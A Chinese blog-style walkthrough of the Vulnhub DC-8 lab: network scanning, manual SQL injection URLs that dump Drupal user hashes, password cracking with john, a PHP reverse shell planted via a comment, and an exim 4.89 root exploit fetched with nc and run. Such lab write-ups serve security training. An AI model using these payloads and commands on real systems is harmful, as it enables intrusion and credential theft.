Vulnhub-DC-8
(0)

首先用 namp 扫描,获取目标 IP 地址:nmap -sn 192.168.67.0/24

74d63a84587ec54a3ac3a87b8f31176.png

其次再用 nmap 扫描下目标端口:nmap -A -p- 192.168.67.52/24

ebe78043e124dcba15244cc185b8144.png

看来开放了 80 和 22 端口,上去网页浏览下:
8e35e8d7d0887c530a4a944e61867be.png

点开各个页面看看,可以发现有些 URL 地址栏会变,在这里补充个知识 Drupal 的 id 名称为 node id 简称 nid,这里因为显示 2 3 node 所以想着会不会有 SQL 注入:
d388cfc614aa1fea96767deb32b9b35.png

尝试加个单引号,就会产生报错信息,这在 Sqlilabs 上面训练的很多了,我们就知道这有注入
http://192.168.67.52/node/?nid=1%27

1d0f31bfb736057d170d2d48a72e879.png

通过报错,我们可以看到后台 SQL 语句为:
SELECT title FROM node WHERE nid = 1;

下面是手工注入的过程:
http://192.168.67.52/node/?nid=1%27%23
http://192.168.67.52/node/?nid=1 order by 2--报错
http://192.168.67.52/node/?nid=-1 union select 1
e3a8403ccb0b3707945a558980fb131.png

爆表名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema=database())

3c31dc4fb1516305e021b13505bec37.png

爆列名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')

37d7cc8f6298e442277377425674097.png

爆数据:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(name) from users)
http://192.168.67.52/node/?nid=-1 union select (select group_concat(pass) from users)
6b4e6df247ae6e401303998b1c685f9.png
a14b10727ae16a225befd69b12c56e2.png

kali 字典跑一下这两个用户:
把密码存放到 pwd.txt
john pwd.txt
john --show pwd.txt
得到密码:turtle

http://192.168.67.52/robots.txt 查看一下有什么页面,利用刚刚得到的用户名和密码登陆:
http://192.168.67.52/user/login/
可以在这个页面下看到可以上传 php code,这里需要在前面随便加一点东西,否则不会生效:D原因尚不明

7fb69eb91db4f0f382c1ab44e99c1ba.png

保存后,我们提交评论上去,并且 kali 做好侦听的准备:
webshell可选:/usr/share/webshells/php/php-reverse-shell.php
也可以 weevely 构造:|
6ede122413af9eecc54b7130d646a2f.png

提交即可获取 shell:
b4bcff3f8c5d27abe101bccc048c2a7.png
ls -l /home
ls -l /home/dc8user 没有发现
b964860def883923b546c554caaf337.png

看看有无可疑提权的...
find -perm -4000
f950c529aa0bd30a4c5a639c6edb608.png

看到 exim 没有,有没有一种熟悉的感觉?前几关我们利用过呢~
先查看一下当前 exim 的版本:(man exim 查看文档)
exim --version
079dad52663230f3eca831df45a6589.png

4.89,前面几关不都是 4.89 吗?
a24c1da7af504fc36a900251cd12cb7.png

话不多说,传 poc:
kali 这边:
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/k.sh
gedit k.sh查看下用法
有两个参数,一个事 -m setuid || 另外一个是 -m netcat,一般第一个的利用都不成功的,直接试 netcat 先
这里还需要防止格式错误:
vim k.sh
set ff=unix
Esc+:+wq
nc -vnlp 6767 < k.sh

/bin/bash这边:
cd /tmp
nc 192.168.67.221 6767 > k.sh
chmod +x k.sh
bash k.sh -m netcat
90ff8de3b27df73df70bf78c6e7a84f.png
7b3c837e28ffc3eeb28353baab5144c.png

一口气,爽爆了

总结:
1.SQL 注入
2.对常见的CMS要深入了解
3.细心观察
4.linux 提权
本文为作者HD_More发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论